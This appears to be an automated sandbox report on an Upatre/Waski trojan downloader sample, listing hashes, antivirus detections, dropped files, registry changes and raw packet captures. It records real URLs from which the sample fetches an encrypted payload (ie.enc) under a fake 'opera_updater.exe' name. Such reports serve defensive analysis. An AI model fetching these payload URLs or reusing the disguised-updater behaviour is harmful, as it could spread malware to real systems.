Analysis Date2015-10-13 22:02:09
MD5e733999b6529a8b63e9d2bc05dd748e8
SHA166ba37038a7ec3472b8d2b227165f52418982185

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1cfe640fb916f9e71e2f42ce9463b6e6 sha1: d3cefe831eba88d17380b6e877f968ab01e72878 size: 6144
Section.rdata md5: 5991a0937ea1c73a6ea7d2b50760dccf sha1: b09ba9081a37296905432830e2b7a3f680249f52 size: 1536
Section.data md5: 36f425ac30a34478057dae27a1407f15 sha1: 27c149c9c2f3499e5e8e775de3eeba3e88845640 size: 512
Section.rsrc md5: d312230fc901e21ad5d01f3359ba6e14 sha1: 9a3ea68fc338ca5068121b66142c23539c4c2819 size: 10240
Section.reloc md5: 5941791c6b31ac52e41a5ea0912259d3 sha1: 953eb4ea14eb81b605c22a5b1c6a2a709e64de33 size: 512
Timestamp2014-02-05 03:55:00
PEhash2394682c218c1f7651bd92f22a4a09342e6bc7ab
IMPhash7772dfa3e3a72b92db47c13e7be36e20
AVRisingno_virus
AVMcafeeDownloader-FSH!E733999B6529
AVAvira (antivir)TR/Yarwi.B.176
AVTwisterTrojan.4EB8D0DD116B77B2
AVAd-AwareTrojan.GenericKD.1559549
AVAlwil (avast)Zbot-TCT [Trj]
AVEset (nod32)Win32/TrojanDownloader.Waski.A
AVGrisoft (avg)Generic35.BQYO
AVSymantecDownloader.Upatre
AVFortinetW32/Waski.AC!tr
AVBitDefenderTrojan.GenericKD.1559549
AVK7Trojan ( 0040f71e1 )
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.AA
AVMicroWorld (escan)Trojan.GenericKD.1559549
AVMalwareBytesTrojan.Downloader.Upatre
AVAuthentiumW32/Trojan.QXZZ-7823
AVFrisk (f-prot)W32/Trojan3.HKY
AVIkarusTrojan-Downloader.Win32.Upatre
AVEmsisoftTrojan.GenericKD.1559549
AVZillya!Downloader.Injecter.Win32.5149
AVKasperskyTrojan-Downloader.Win32.Injecter.jiq
AVTrend MicroTROJ_UPATRE.SMBB
AVCAT (quickheal)TrojanDownloader.Upatre.A4
AVVirusBlokAda (vba32)TrojanDownloader.Injecter
AVPadvishDownloader.Win32.Injecter.ji_Generic
AVBullGuardTrojan.GenericKD.1559549
AVArcabit (arcavir)Trojan.GenericKD.1559549
AVClamAVWin.Trojan.Generickd-68
AVDr. WebTrojan.DownLoad3.28161
AVF-SecureTrojan-Downloader:W32/Upatre.I
AVCA (E-Trust Ino)Win32/Tnega.GXNWZHB

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbsitacademy.com
Winsock DNSwahidexpress.com

Network Details:

DNSbsitacademy.com
Type: A
209.99.40.222
DNSwahidexpress.com
Type: A
103.15.74.65
HTTP GEThttp://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
Flows TCP192.168.1.1:1031 ➝ 209.99.40.222:80
Flows TCP192.168.1.1:1032 ➝ 103.15.74.65:80
Flows TCP192.168.1.1:1033 ➝ 209.99.40.222:80
Flows TCP192.168.1.1:1034 ➝ 103.15.74.65:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         


Strings